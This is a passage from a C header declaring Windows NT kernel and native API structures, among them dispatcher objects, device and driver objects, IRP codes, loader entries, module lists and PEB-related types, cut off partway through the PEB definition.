  // Mutant\n\t\t\tUCHAR MutantType;\n\t\t\tUCHAR MutantSize;\n\t\t\tBOOLEAN DpcActive;\n\t\t\tUCHAR MutantReserved;\n\t\t} DUMMYSTRUCTNAME6;\n\t} DUMMYUNIONNAME;\n\n\tLONG SignalState;                   // Object lock\n\tLIST_ENTRY WaitListHead;            // Object lock\n} DISPATCHER_HEADER, *PDISPATCHER_HEADER;\n\ntypedef struct _KEVENT {\n\tDISPATCHER_HEADER Header;\n} KEVENT, *PKEVENT, *PRKEVENT;\n\ntypedef struct _KMUTANT {\n\tDISPATCHER_HEADER Header;\n\tLIST_ENTRY MutantListEntry;\n\tstruct _KTHREAD *OwnerThread;\n\tBOOLEAN Abandoned;\n\tUCHAR ApcDisable;\n} KMUTANT, *PKMUTANT, *PRKMUTANT, KMUTEX, *PKMUTEX, *PRKMUTEX;\n\ntypedef struct _KSEMAPHORE {\n\tDISPATCHER_HEADER Header;\n\tLONG Limit;\n} 
KSEMAPHORE, *PKSEMAPHORE, *PRKSEMAPHORE;\n\ntypedef struct _KTIMER {\n\tDISPATCHER_HEADER Header;\n\tULARGE_INTEGER DueTime;\n\tLIST_ENTRY TimerListEntry;\n\tstruct _KDPC *Dpc;\n\tULONG Processor;\n\tLONG Period;\n} KTIMER, *PKTIMER, *PRKTIMER;\n\ntypedef struct _KDEVICE_QUEUE_ENTRY {\n\tLIST_ENTRY DeviceListEntry;\n\tULONG SortKey;\n\tBOOLEAN Inserted;\n} KDEVICE_QUEUE_ENTRY, *PKDEVICE_QUEUE_ENTRY, *PRKDEVICE_QUEUE_ENTRY;\n\ntypedef enum _KDPC_IMPORTANCE {\n\tLowImportance,\n\tMediumImportance,\n\tHighImportance\n} KDPC_IMPORTANCE;\n\ntypedef struct _KDPC {\n\tunion {\n\t\tULONG TargetInfoAsUlong;\n\t\tstruct {\n\t\t\tUCHAR Type;\n\t\t\tUCHAR Importance;\n\t\t\tvolatile USHORT Number;\n\t\t} DUMMYSTRUCTNAME;\n\t} DUMMYUNIONNAME;\n\n\tSINGLE_LIST_ENTRY DpcListEntry;\n\tKAFFINITY ProcessorHistory;\n\tPVOID DeferredRoutine;\n\tPVOID DeferredContext;\n\tPVOID SystemArgument1;\n\tPVOID SystemArgument2;\n\t__volatile PVOID DpcData;\n} KDPC, *PKDPC, *PRKDPC;\n\ntypedef struct _WAIT_CONTEXT_BLOCK {\n\tunion {\n\t\tKDEVICE_QUEUE_ENTRY WaitQueueEntry;\n\t\tstruct {\n\t\t\tLIST_ENTRY DmaWaitEntry;\n\t\t\tULONG NumberOfChannels;\n\t\t\tULONG SyncCallback : 1;\n\t\t\tULONG DmaContext : 1;\n\t\t\tULONG Reserved : 30;\n\t\t};\n\t};\n\tPVOID DeviceRoutine;\n\tPVOID DeviceContext;\n\tULONG NumberOfMapRegisters;\n\tPVOID DeviceObject;\n\tPVOID CurrentIrp;\n\tPKDPC BufferChainingDpc;\n} WAIT_CONTEXT_BLOCK, *PWAIT_CONTEXT_BLOCK;\n\n#define MAXIMUM_VOLUME_LABEL_LENGTH  (32 * sizeof(WCHAR)) // 32 characters\n\ntypedef struct _VPB {\n\tCSHORT Type;\n\tCSHORT Size;\n\tUSHORT Flags;\n\tUSHORT VolumeLabelLength; // in bytes\n\tstruct _DEVICE_OBJECT *DeviceObject;\n\tstruct _DEVICE_OBJECT *RealDevice;\n\tULONG SerialNumber;\n\tULONG ReferenceCount;\n\tWCHAR VolumeLabel[MAXIMUM_VOLUME_LABEL_LENGTH / sizeof(WCHAR)];\n} VPB, *PVPB;\n\ntypedef struct _KQUEUE {\n\tDISPATCHER_HEADER Header;\n\tLIST_ENTRY EntryListHead;\n\tULONG CurrentCount;\n\tULONG MaximumCount;\n\tLIST_ENTRY ThreadListHead;\n} 
KQUEUE, *PKQUEUE;\n\ntypedef struct _KDEVICE_QUEUE {\n\tCSHORT Type;\n\tCSHORT Size;\n\tLIST_ENTRY DeviceListHead;\n\tKSPIN_LOCK Lock;\n\n#if defined(_AMD64_)\n\n\tunion {\n\t\tBOOLEAN Busy;\n\t\tstruct {\n\t\t\tLONG64 Reserved : 8;\n\t\t\tLONG64 Hint : 56;\n\t\t};\n\t};\n\n#else\n\n\tBOOLEAN Busy;\n\n#endif\n\n} KDEVICE_QUEUE, *PKDEVICE_QUEUE, *PRKDEVICE_QUEUE;\n\nenum _KOBJECTS {\n\tEventNotificationObject = 0x0,\n\tEventSynchronizationObject = 0x1,\n\tMutantObject = 0x2,\n\tProcessObject = 0x3,\n\tQueueObject = 0x4,\n\tSemaphoreObject = 0x5,\n\tThreadObject = 0x6,\n\tGateObject = 0x7,\n\tTimerNotificationObject = 0x8,\n\tTimerSynchronizationObject = 0x9,\n\tSpare2Object = 0xa,\n\tSpare3Object = 0xb,\n\tSpare4Object = 0xc,\n\tSpare5Object = 0xd,\n\tSpare6Object = 0xe,\n\tSpare7Object = 0xf,\n\tSpare8Object = 0x10,\n\tSpare9Object = 0x11,\n\tApcObject = 0x12,\n\tDpcObject = 0x13,\n\tDeviceQueueObject = 0x14,\n\tEventPairObject = 0x15,\n\tInterruptObject = 0x16,\n\tProfileObject = 0x17,\n\tThreadedDpcObject = 0x18,\n\tMaximumKernelObject = 0x19,\n};\n\n#define DO_VERIFY_VOLUME                0x00000002      // ntddk nthal ntifs wdm\n#define DO_BUFFERED_IO                  0x00000004      // ntddk nthal ntifs wdm\n#define DO_EXCLUSIVE                    0x00000008      // ntddk nthal ntifs wdm\n#define DO_DIRECT_IO                    0x00000010      // ntddk nthal ntifs wdm\n#define DO_MAP_IO_BUFFER                0x00000020      // ntddk nthal ntifs wdm\n#define DO_DEVICE_HAS_NAME              0x00000040      // ntddk nthal ntifs\n#define DO_DEVICE_INITIALIZING          0x00000080      // ntddk nthal ntifs wdm\n#define DO_SYSTEM_BOOT_PARTITION        0x00000100      // ntddk nthal ntifs\n#define DO_LONG_TERM_REQUESTS           0x00000200      // ntddk nthal ntifs\n#define DO_NEVER_LAST_DEVICE            0x00000400      // ntddk nthal ntifs\n#define DO_SHUTDOWN_REGISTERED          0x00000800      // ntddk nthal ntifs wdm\n#define DO_BUS_ENUMERATED_DEVICE        
0x00001000      // ntddk nthal ntifs wdm\n#define DO_POWER_PAGABLE                0x00002000      // ntddk nthal ntifs wdm\n#define DO_POWER_INRUSH                 0x00004000      // ntddk nthal ntifs wdm\n#define DO_POWER_NOOP                   0x00008000\n#define DO_LOW_PRIORITY_FILESYSTEM      0x00010000      // ntddk nthal ntifs\n#define DO_XIP                          0x00020000\n\n#define FILE_REMOVABLE_MEDIA                        0x00000001\n#define FILE_READ_ONLY_DEVICE                       0x00000002\n#define FILE_FLOPPY_DISKETTE                        0x00000004\n#define FILE_WRITE_ONCE_MEDIA                       0x00000008\n#define FILE_REMOTE_DEVICE                          0x00000010\n#define FILE_DEVICE_IS_MOUNTED                      0x00000020\n#define FILE_VIRTUAL_VOLUME                         0x00000040\n#define FILE_AUTOGENERATED_DEVICE_NAME              0x00000080\n#define FILE_DEVICE_SECURE_OPEN                     0x00000100\n#define FILE_CHARACTERISTIC_PNP_DEVICE              0x00000800\n#define FILE_CHARACTERISTIC_TS_DEVICE               0x00001000\n#define FILE_CHARACTERISTIC_WEBDAV_DEVICE           0x00002000\n#define FILE_CHARACTERISTIC_CSV                     0x00010000\n#define FILE_DEVICE_ALLOW_APPCONTAINER_TRAVERSAL    0x00020000\n#define FILE_PORTABLE_DEVICE                        0x00040000\n\n#define FILE_DEVICE_BEEP                0x00000001\n#define FILE_DEVICE_CD_ROM              0x00000002\n#define FILE_DEVICE_CD_ROM_FILE_SYSTEM  0x00000003\n#define FILE_DEVICE_CONTROLLER          0x00000004\n#define FILE_DEVICE_DATALINK            0x00000005\n#define FILE_DEVICE_DFS                 0x00000006\n#define FILE_DEVICE_DISK                0x00000007\n#define FILE_DEVICE_DISK_FILE_SYSTEM    0x00000008\n#define FILE_DEVICE_FILE_SYSTEM         0x00000009\n#define FILE_DEVICE_INPORT_PORT         0x0000000a\n#define FILE_DEVICE_KEYBOARD            0x0000000b\n#define FILE_DEVICE_MAILSLOT            0x0000000c\n#define 
FILE_DEVICE_MIDI_IN             0x0000000d\n#define FILE_DEVICE_MIDI_OUT            0x0000000e\n#define FILE_DEVICE_MOUSE               0x0000000f\n#define FILE_DEVICE_MULTI_UNC_PROVIDER  0x00000010\n#define FILE_DEVICE_NAMED_PIPE          0x00000011\n#define FILE_DEVICE_NETWORK             0x00000012\n#define FILE_DEVICE_NETWORK_BROWSER     0x00000013\n#define FILE_DEVICE_NETWORK_FILE_SYSTEM 0x00000014\n#define FILE_DEVICE_NULL                0x00000015\n#define FILE_DEVICE_PARALLEL_PORT       0x00000016\n#define FILE_DEVICE_PHYSICAL_NETCARD    0x00000017\n#define FILE_DEVICE_PRINTER             0x00000018\n#define FILE_DEVICE_SCANNER             0x00000019\n#define FILE_DEVICE_SERIAL_MOUSE_PORT   0x0000001a\n#define FILE_DEVICE_SERIAL_PORT         0x0000001b\n#define FILE_DEVICE_SCREEN              0x0000001c\n#define FILE_DEVICE_SOUND               0x0000001d\n#define FILE_DEVICE_STREAMS             0x0000001e\n#define FILE_DEVICE_TAPE                0x0000001f\n#define FILE_DEVICE_TAPE_FILE_SYSTEM    0x00000020\n#define FILE_DEVICE_TRANSPORT           0x00000021\n#define FILE_DEVICE_UNKNOWN             0x00000022\n#define FILE_DEVICE_VIDEO               0x00000023\n#define FILE_DEVICE_VIRTUAL_DISK        0x00000024\n#define FILE_DEVICE_WAVE_IN             0x00000025\n#define FILE_DEVICE_WAVE_OUT            0x00000026\n#define FILE_DEVICE_8042_PORT           0x00000027\n#define FILE_DEVICE_NETWORK_REDIRECTOR  0x00000028\n#define FILE_DEVICE_BATTERY             0x00000029\n#define FILE_DEVICE_BUS_EXTENDER        0x0000002a\n#define FILE_DEVICE_MODEM               0x0000002b\n#define FILE_DEVICE_VDM                 0x0000002c\n#define FILE_DEVICE_MASS_STORAGE        0x0000002d\n#define FILE_DEVICE_SMB                 0x0000002e\n#define FILE_DEVICE_KS                  0x0000002f\n#define FILE_DEVICE_CHANGER             0x00000030\n#define FILE_DEVICE_SMARTCARD           0x00000031\n#define FILE_DEVICE_ACPI                0x00000032\n#define FILE_DEVICE_DVD         
        0x00000033\n#define FILE_DEVICE_FULLSCREEN_VIDEO    0x00000034\n#define FILE_DEVICE_DFS_FILE_SYSTEM     0x00000035\n#define FILE_DEVICE_DFS_VOLUME          0x00000036\n#define FILE_DEVICE_SERENUM             0x00000037\n#define FILE_DEVICE_TERMSRV             0x00000038\n#define FILE_DEVICE_KSEC                0x00000039\n#define FILE_DEVICE_FIPS                0x0000003A\n#define FILE_DEVICE_INFINIBAND          0x0000003B\n#define FILE_DEVICE_VMBUS               0x0000003E\n#define FILE_DEVICE_CRYPT_PROVIDER      0x0000003F\n#define FILE_DEVICE_WPD                 0x00000040\n#define FILE_DEVICE_BLUETOOTH           0x00000041\n#define FILE_DEVICE_MT_COMPOSITE        0x00000042\n#define FILE_DEVICE_MT_TRANSPORT        0x00000043\n#define FILE_DEVICE_BIOMETRIC           0x00000044\n#define FILE_DEVICE_PMI                 0x00000045\n#define FILE_DEVICE_EHSTOR              0x00000046\n#define FILE_DEVICE_DEVAPI              0x00000047\n#define FILE_DEVICE_GPIO                0x00000048\n#define FILE_DEVICE_USBEX               0x00000049\n#define FILE_DEVICE_CONSOLE             0x00000050\n#define FILE_DEVICE_NFP                 0x00000051\n#define FILE_DEVICE_SYSENV              0x00000052\n#define FILE_DEVICE_VIRTUAL_BLOCK       0x00000053\n#define FILE_DEVICE_POINT_OF_SERVICE    0x00000054\n\n#define FILE_BYTE_ALIGNMENT             0x00000000\n#define FILE_WORD_ALIGNMENT             0x00000001\n#define FILE_LONG_ALIGNMENT             0x00000003\n#define FILE_QUAD_ALIGNMENT             0x00000007\n#define FILE_OCTA_ALIGNMENT             0x0000000f\n#define FILE_32_BYTE_ALIGNMENT          0x0000001f\n#define FILE_64_BYTE_ALIGNMENT          0x0000003f\n#define FILE_128_BYTE_ALIGNMENT         0x0000007f\n#define FILE_256_BYTE_ALIGNMENT         0x000000ff\n#define FILE_512_BYTE_ALIGNMENT         0x000001ff\n\n#define DPC_NORMAL 0\n#define DPC_THREADED 1\n\ntypedef struct _DEVICE_OBJECT {\n\tCSHORT                      Type;\n\tUSHORT                      
Size;\n\tLONG                        ReferenceCount;\n\tstruct _DRIVER_OBJECT  *DriverObject;\n\tstruct _DEVICE_OBJECT  *NextDevice;\n\tstruct _DEVICE_OBJECT  *AttachedDevice;\n\tstruct _IRP  *CurrentIrp;\n\tPVOID\t\t                Timer;\n\tULONG                       Flags;\n\tULONG                       Characteristics;\n\t__volatile PVPB             Vpb;\n\tPVOID                       DeviceExtension;\n\tDEVICE_TYPE                 DeviceType;\n\tCCHAR                       StackSize;\n\tunion {\n\t\tLIST_ENTRY         ListEntry;\n\t\tWAIT_CONTEXT_BLOCK Wcb;\n\t} Queue;\n\tULONG                       AlignmentRequirement;\n\tKDEVICE_QUEUE               DeviceQueue;\n\tKDPC                        Dpc;\n\tULONG                       ActiveThreadCount;\n\tPSECURITY_DESCRIPTOR        SecurityDescriptor;\n\tKEVENT                      DeviceLock;\n\tUSHORT                      SectorSize;\n\tUSHORT                      Spare1;\n\tstruct _DEVOBJ_EXTENSION  *  DeviceObjectExtension;\n\tPVOID                       Reserved;\n} DEVICE_OBJECT, *PDEVICE_OBJECT;\n\ntypedef struct _DEVOBJ_EXTENSION {\n\n\tCSHORT          Type;\n\tUSHORT          Size;\n\n\t//\n\t// Public part of the DeviceObjectExtension structure\n\t//\n\n\tPDEVICE_OBJECT  DeviceObject;               // owning device object\n\n\t// end_ntddk end_nthal end_ntifs end_wdm end_ntosp\n\n\t//\n\t// Universal Power Data - all device objects must have this\n\t//\n\n\tULONG           PowerFlags;             // see ntos\\po\\pop.h\n\t// WARNING: Access via PO macros\n\t// and with PO locking rules ONLY.\n\n\t//\n\t// Pointer to the non-universal power data\n\t//  Power data that only some device objects need is stored in the\n\t//  device object power extension -> DOPE\n\t//  see po.h\n\t//\n\n\tstruct          _DEVICE_OBJECT_POWER_EXTENSION  *Dope;\n\n\t//\n\t// power state information\n\t//\n\n\t//\n\t// Device object extension flags.  
Protected by the IopDatabaseLock.\n\t//\n\n\tULONG ExtensionFlags;\n\n\t//\n\t// PnP manager fields\n\t//\n\n\tPVOID           DeviceNode;\n\n\t//\n\t// AttachedTo is a pointer to the device object that this device\n\t// object is attached to.  The attachment chain is now doubly\n\t// linked: this pointer and DeviceObject->AttachedDevice provide the\n\t// linkage.\n\t//\n\n\tPDEVICE_OBJECT  AttachedTo;\n\n\t//\n\t// The next two fields are used to prevent recursion in IoStartNextPacket\n\t// interfaces.\n\t//\n\n\tLONG           StartIoCount;       // Used to keep track of number of pending start ios.\n\tLONG           StartIoKey;         // Next startio key\n\tULONG          StartIoFlags;       // Start Io Flags. Need a separate flag so that it can be accessed without locks\n\tPVPB           Vpb;                // If not NULL contains the VPB of the mounted volume.\n\t// Set in the filesystem's volume device object.\n\t// This is a reverse VPB pointer.\n\n\t// begin_ntddk begin_wdm begin_nthal begin_ntifs begin_ntosp\n\n} DEVOBJ_EXTENSION, *PDEVOBJ_EXTENSION;\n\ntypedef struct _FAST_IO_DISPATCH {\n\tULONG SizeOfFastIoDispatch;\n\tPVOID FastIoCheckIfPossible;\n\tPVOID FastIoRead;\n\tPVOID FastIoWrite;\n\tPVOID FastIoQueryBasicInfo;\n\tPVOID FastIoQueryStandardInfo;\n\tPVOID FastIoLock;\n\tPVOID FastIoUnlockSingle;\n\tPVOID FastIoUnlockAll;\n\tPVOID FastIoUnlockAllByKey;\n\tPVOID FastIoDeviceControl;\n\tPVOID AcquireFileForNtCreateSection;\n\tPVOID ReleaseFileForNtCreateSection;\n\tPVOID FastIoDetachDevice;\n\tPVOID FastIoQueryNetworkOpenInfo;\n\tPVOID AcquireForModWrite;\n\tPVOID MdlRead;\n\tPVOID MdlReadComplete;\n\tPVOID PrepareMdlWrite;\n\tPVOID MdlWriteComplete;\n\tPVOID FastIoReadCompressed;\n\tPVOID FastIoWriteCompressed;\n\tPVOID MdlReadCompleteCompressed;\n\tPVOID MdlWriteCompleteCompressed;\n\tPVOID FastIoQueryOpen;\n\tPVOID ReleaseForModWrite;\n\tPVOID AcquireForCcFlush;\n\tPVOID ReleaseForCcFlush;\n} FAST_IO_DISPATCH, *PFAST_IO_DISPATCH;\n\n#define 
IO_TYPE_ADAPTER                 0x00000001\n#define IO_TYPE_CONTROLLER              0x00000002\n#define IO_TYPE_DEVICE                  0x00000003\n#define IO_TYPE_DRIVER                  0x00000004\n#define IO_TYPE_FILE                    0x00000005\n#define IO_TYPE_IRP                     0x00000006\n#define IO_TYPE_MASTER_ADAPTER          0x00000007\n#define IO_TYPE_OPEN_PACKET             0x00000008\n#define IO_TYPE_TIMER                   0x00000009\n#define IO_TYPE_VPB                     0x0000000a\n#define IO_TYPE_ERROR_LOG               0x0000000b\n#define IO_TYPE_ERROR_MESSAGE           0x0000000c\n#define IO_TYPE_DEVICE_OBJECT_EXTENSION 0x0000000d\n\n#define IRP_MJ_CREATE                   0x00\n#define IRP_MJ_CREATE_NAMED_PIPE        0x01\n#define IRP_MJ_CLOSE                    0x02\n#define IRP_MJ_READ                     0x03\n#define IRP_MJ_WRITE                    0x04\n#define IRP_MJ_QUERY_INFORMATION        0x05\n#define IRP_MJ_SET_INFORMATION          0x06\n#define IRP_MJ_QUERY_EA                 0x07\n#define IRP_MJ_SET_EA                   0x08\n#define IRP_MJ_FLUSH_BUFFERS            0x09\n#define IRP_MJ_QUERY_VOLUME_INFORMATION 0x0a\n#define IRP_MJ_SET_VOLUME_INFORMATION   0x0b\n#define IRP_MJ_DIRECTORY_CONTROL        0x0c\n#define IRP_MJ_FILE_SYSTEM_CONTROL      0x0d\n#define IRP_MJ_DEVICE_CONTROL           0x0e\n#define IRP_MJ_INTERNAL_DEVICE_CONTROL  0x0f\n#define IRP_MJ_SHUTDOWN                 0x10\n#define IRP_MJ_LOCK_CONTROL             0x11\n#define IRP_MJ_CLEANUP                  0x12\n#define IRP_MJ_CREATE_MAILSLOT          0x13\n#define IRP_MJ_QUERY_SECURITY           0x14\n#define IRP_MJ_SET_SECURITY             0x15\n#define IRP_MJ_POWER                    0x16\n#define IRP_MJ_SYSTEM_CONTROL           0x17\n#define IRP_MJ_DEVICE_CHANGE            0x18\n#define IRP_MJ_QUERY_QUOTA              0x19\n#define IRP_MJ_SET_QUOTA                0x1a\n#define IRP_MJ_PNP                      0x1b\n#define IRP_MJ_PNP_POWER                
IRP_MJ_PNP      \n#define IRP_MJ_MAXIMUM_FUNCTION         0x1b\n\ntypedef struct _DRIVER_EXTENSION {\n\n\t//\n\t// Back pointer to Driver Object\n\t//\n\n\tstruct _DRIVER_OBJECT *DriverObject;\n\n\t//\n\t// The AddDevice entry point is called by the Plug & Play manager\n\t// to inform the driver when a new device instance arrives that this\n\t// driver must control.\n\t//\n\n\tPVOID AddDevice;\n\n\t//\n\t// The count field is used to count the number of times the driver has\n\t// had its registered reinitialization routine invoked.\n\t//\n\n\tULONG Count;\n\n\t//\n\t// The service name field is used by the pnp manager to determine\n\t// where the driver related info is stored in the registry.\n\t//\n\n\tUNICODE_STRING ServiceKeyName;\n\n} DRIVER_EXTENSION, *PDRIVER_EXTENSION;\n\n#define DRVO_UNLOAD_INVOKED             0x00000001\n#define DRVO_LEGACY_DRIVER              0x00000002\n#define DRVO_BUILTIN_DRIVER             0x00000004    // Driver objects for Hal, PnP Mgr\n#define DRVO_REINIT_REGISTERED          0x00000008\n#define DRVO_INITIALIZED                0x00000010\n#define DRVO_BOOTREINIT_REGISTERED      0x00000020\n#define DRVO_LEGACY_RESOURCES           0x00000040\n// end_ntddk end_nthal end_ntifs end_ntosp\n#define DRVO_BASE_FILESYSTEM_DRIVER     0x00000080   // A driver that is at the bottom of the filesystem stack.\n// begin_ntddk begin_nthal begin_ntifs begin_ntosp\n\ntypedef struct _DRIVER_OBJECT {\n\tCSHORT Type;\n\tCSHORT Size;\n\n\t//\n\t// The following links all of the devices created by a single driver\n\t// together on a list, and the Flags word provides an extensible flag\n\t// location for driver objects.\n\t//\n\n\tPDEVICE_OBJECT DeviceObject;\n\tULONG Flags;\n\n\t//\n\t// The following section describes where the driver is loaded.  
The count\n\t// field is used to count the number of times the driver has had its\n\t// registered reinitialization routine invoked.\n\t//\n\n\tPVOID DriverStart;\n\tULONG DriverSize;\n\tPVOID DriverSection; //PLDR_DATA_TABLE_ENTRY\n\tPDRIVER_EXTENSION DriverExtension;\n\n\t//\n\t// The driver name field is used by the error log thread to\n\t// determine the name of the driver that an I/O request is/was bound.\n\t//\n\n\tUNICODE_STRING DriverName;\n\n\t//\n\t// The following section is for registry support.  This is a pointer\n\t// to the path to the hardware information in the registry\n\t//\n\n\tPUNICODE_STRING HardwareDatabase;\n\n\t//\n\t// The following section contains the optional pointer to an array of\n\t// alternate entry points to a driver for \"fast I/O\" support.  Fast I/O\n\t// is performed by invoking the driver routine directly with separate\n\t// parameters, rather than using the standard IRP call mechanism.  Note\n\t// that these functions may only be used for synchronous I/O, and when\n\t// the file is cached.\n\t//\n\n\tPFAST_IO_DISPATCH FastIoDispatch;\n\n\t//\n\t// The following section describes the entry points to this particular\n\t// driver.  
Note that the major function dispatch table must be the last\n\t// field in the object so that it remains extensible.\n\t//\n\n\tPVOID DriverInit;\n\tPVOID DriverStartIo;\n\tPVOID DriverUnload;\n\tPVOID MajorFunction[IRP_MJ_MAXIMUM_FUNCTION + 1];\n\n} DRIVER_OBJECT;\ntypedef struct _DRIVER_OBJECT *PDRIVER_OBJECT;\n\ntypedef struct _LDR_RESOURCE_INFO {\n\tULONG_PTR Type;\n\tULONG_PTR Name;\n\tULONG Lang;\n} LDR_RESOURCE_INFO, *PLDR_RESOURCE_INFO;\n\ntypedef struct _LDR_DATA_TABLE_ENTRY_COMPATIBLE {\n\tLIST_ENTRY InLoadOrderLinks;\n\tLIST_ENTRY InMemoryOrderLinks;\n\tunion\n\t{\n\t\tLIST_ENTRY InInitializationOrderLinks;\n\t\tLIST_ENTRY InProgressLinks;\n\t} DUMMYUNION0;\n\tPVOID DllBase;\n\tPVOID EntryPoint;\n\tULONG SizeOfImage;\n\tUNICODE_STRING FullDllName;\n\tUNICODE_STRING BaseDllName;\n\tULONG Flags;\n\tWORD ObsoleteLoadCount;\n\tWORD TlsIndex;\n\tunion\n\t{\n\t\tLIST_ENTRY HashLinks;\n\t\tstruct\n\t\t{\n\t\t\tPVOID SectionPointer;\n\t\t\tULONG CheckSum;\n\t\t};\n\t} DUMMYUNION1;\n\tunion\n\t{\n\t\tULONG TimeDateStamp;\n\t\tPVOID LoadedImports;\n\t} DUMMYUNION2;\n\t//fields below removed for compatibility\n} LDR_DATA_TABLE_ENTRY_COMPATIBLE, *PLDR_DATA_TABLE_ENTRY_COMPATIBLE;\ntypedef LDR_DATA_TABLE_ENTRY_COMPATIBLE LDR_DATA_TABLE_ENTRY;\ntypedef LDR_DATA_TABLE_ENTRY_COMPATIBLE *PLDR_DATA_TABLE_ENTRY;\ntypedef LDR_DATA_TABLE_ENTRY *PCLDR_DATA_TABLE_ENTRY;\n\n/*\n* WDM END\n*/\n\n/*\n*  NTQSI Modules START\n*/\n\ntypedef struct _RTL_PROCESS_MODULE_INFORMATION {\n\tHANDLE Section;\n\tPVOID MappedBase;\n\tPVOID ImageBase;\n\tULONG ImageSize;\n\tULONG Flags;\n\tUSHORT LoadOrderIndex;\n\tUSHORT InitOrderIndex;\n\tUSHORT LoadCount;\n\tUSHORT OffsetToFileName;\n\tUCHAR FullPathName[256];\n} RTL_PROCESS_MODULE_INFORMATION, *PRTL_PROCESS_MODULE_INFORMATION;\n\ntypedef struct _RTL_PROCESS_MODULES {\n\tULONG NumberOfModules;\n\tRTL_PROCESS_MODULE_INFORMATION Modules[1];\n} RTL_PROCESS_MODULES, *PRTL_PROCESS_MODULES;\n\n/*\n*\tNTQSI Modules END\n*/\n\n/*\n** Virtual Memory 
START\n*/\n\ntypedef enum _MEMORY_INFORMATION_CLASS\n{\n\tMemoryBasicInformation,\n\tMemoryWorkingSetInformation,\n\tMemoryMappedFilenameInformation,\n\tMemoryRegionInformation,\n\tMemoryWorkingSetExInformation\n} MEMORY_INFORMATION_CLASS, *PMEMORY_INFORMATION_CLASS;\n\ntypedef struct _MEMORY_REGION_INFORMATION {\n\tPVOID AllocationBase;\n\tULONG AllocationProtect;\n\tULONG RegionType;\n\tSIZE_T RegionSize;\n} MEMORY_REGION_INFORMATION, *PMEMORY_REGION_INFORMATION;\n\n/*\n** Virtual Memory END\n*/\n\n/*\n** System Firmware START\n*/\n\ntypedef enum _SYSTEM_FIRMWARE_TABLE_ACTION\n{\n\tSystemFirmwareTable_Enumerate,\n\tSystemFirmwareTable_Get\n} SYSTEM_FIRMWARE_TABLE_ACTION, *PSYSTEM_FIRMWARE_TABLE_ACTION;\n\ntypedef struct _SYSTEM_FIRMWARE_TABLE_INFORMATION {\n\tULONG ProviderSignature;\n\tSYSTEM_FIRMWARE_TABLE_ACTION Action;\n\tULONG TableID;\n\tULONG TableBufferLength;\n\tUCHAR TableBuffer[ANYSIZE_ARRAY];\n} SYSTEM_FIRMWARE_TABLE_INFORMATION, *PSYSTEM_FIRMWARE_TABLE_INFORMATION;\n\n/*\n** System Firmware END\n*/\n\n//\n//  PEB/TEB\n//\ntypedef struct _PEB_LDR_DATA\n{\n\tULONG Length;\n\tBOOLEAN Initialized;\n\tHANDLE SsHandle;\n\tLIST_ENTRY InLoadOrderModuleList;\n\tLIST_ENTRY InMemoryOrderModuleList;\n\tLIST_ENTRY InInitializationOrderModuleList;\n\tPVOID EntryInProgress;\n\tBOOLEAN ShutdownInProgress;\n\tHANDLE ShutdownThreadId;\n} PEB_LDR_DATA, *PPEB_LDR_DATA;\n\ntypedef struct _GDI_HANDLE_ENTRY\n{\n\tunion\n\t{\n\t\tPVOID Object;\n\t\tPVOID NextFree;\n\t};\n\tunion\n\t{\n\t\tstruct\n\t\t{\n\t\t\tUSHORT ProcessId;\n\t\t\tUSHORT Lock : 1;\n\t\t\tUSHORT Count : 15;\n\t\t};\n\t\tULONG Value;\n\t} Owner;\n\tUSHORT Unique;\n\tUCHAR Type;\n\tUCHAR Flags;\n\tPVOID UserPointer;\n} GDI_HANDLE_ENTRY, *PGDI_HANDLE_ENTRY;\n\n#define GDI_MAX_HANDLE_COUNT 0x4000\n\ntypedef struct _GDI_SHARED_MEMORY\n{\n\tGDI_HANDLE_ENTRY Handles[GDI_MAX_HANDLE_COUNT];\n} GDI_SHARED_MEMORY, *PGDI_SHARED_MEMORY;\n\n#define FLS_MAXIMUM_AVAILABLE 128\n#define TLS_MINIMUM_AVAILABLE 64\n#define 
TLS_EXPANSION_SLOTS 1024\n\n#define DOS_MAX_COMPONENT_LENGTH 255\n#define DOS_MAX_PATH_LENGTH (DOS_MAX_COMPONENT_LENGTH + 5)\n\ntypedef struct _CURDIR\n{\n\tUNICODE_STRING DosPath;\n\tHANDLE Handle;\n} CURDIR, *PCURDIR;\n\n#define RTL_USER_PROC_CURDIR_CLOSE 0x00000002\n#define RTL_USER_PROC_CURDIR_INHERIT 0x00000003\n\ntypedef struct _RTL_DRIVE_LETTER_CURDIR\n{\n\tUSHORT Flags;\n\tUSHORT Length;\n\tULONG TimeStamp;\n\tSTRING DosPath;\n} RTL_DRIVE_LETTER_CURDIR, *PRTL_DRIVE_LETTER_CURDIR;\n\n#define RTL_MAX_DRIVE_LETTERS 32\n#define RTL_DRIVE_LETTER_VALID (USHORT)0x0001\n\ntypedef struct _RTL_USER_PROCESS_PARAMETERS\n{\n\tULONG MaximumLength;\n\tULONG Length;\n\n\tULONG Flags;\n\tULONG DebugFlags;\n\n\tHANDLE ConsoleHandle;\n\tULONG ConsoleFlags;\n\tHANDLE StandardInput;\n\tHANDLE StandardOutput;\n\tHANDLE StandardError;\n\n\tCURDIR CurrentDirectory;\n\tUNICODE_STRING DllPath;\n\tUNICODE_STRING ImagePathName;\n\tUNICODE_STRING CommandLine;\n\tPVOID Environment;\n\n\tULONG StartingX;\n\tULONG StartingY;\n\tULONG CountX;\n\tULONG CountY;\n\tULONG CountCharsX;\n\tULONG CountCharsY;\n\tULONG FillAttribute;\n\n\tULONG WindowFlags;\n\tULONG ShowWindowFlags;\n\tUNICODE_STRING WindowTitle;\n\tUNICODE_STRING DesktopInfo;\n\tUNICODE_STRING ShellInfo;\n\tUNICODE_STRING RuntimeData;\n\tRTL_DRIVE_LETTER_CURDIR CurrentDirectories[RTL_MAX_DRIVE_LETTERS];\n\n\tULONG EnvironmentSize;\n\tULONG EnvironmentVersion;\n} RTL_USER_PROCESS_PARAMETERS, *PRTL_USER_PROCESS_PARAMETERS;\n\n#define GDI_HANDLE_BUFFER_SIZE32  34\n#define GDI_HANDLE_BUFFER_SIZE64  60\n\n#if !defined(_M_X64)\n#define GDI_HANDLE_BUFFER_SIZE      GDI_HANDLE_BUFFER_SIZE32\n#else\n#define GDI_HANDLE_BUFFER_SIZE      GDI_HANDLE_BUFFER_SIZE64\n#endif\n\ntypedef ULONG GDI_HANDLE_BUFFER32[GDI_HANDLE_BUFFER_SIZE32];\ntypedef ULONG GDI_HANDLE_BUFFER64[GDI_HANDLE_BUFFER_SIZE64];\ntypedef ULONG GDI_HANDLE_BUFFER[GDI_HANDLE_BUFFER_SIZE];\n\ntypedef struct _PEB\n{\n\tBOOLEAN InheritedAddressSpace;\n\tBOOLEAN 
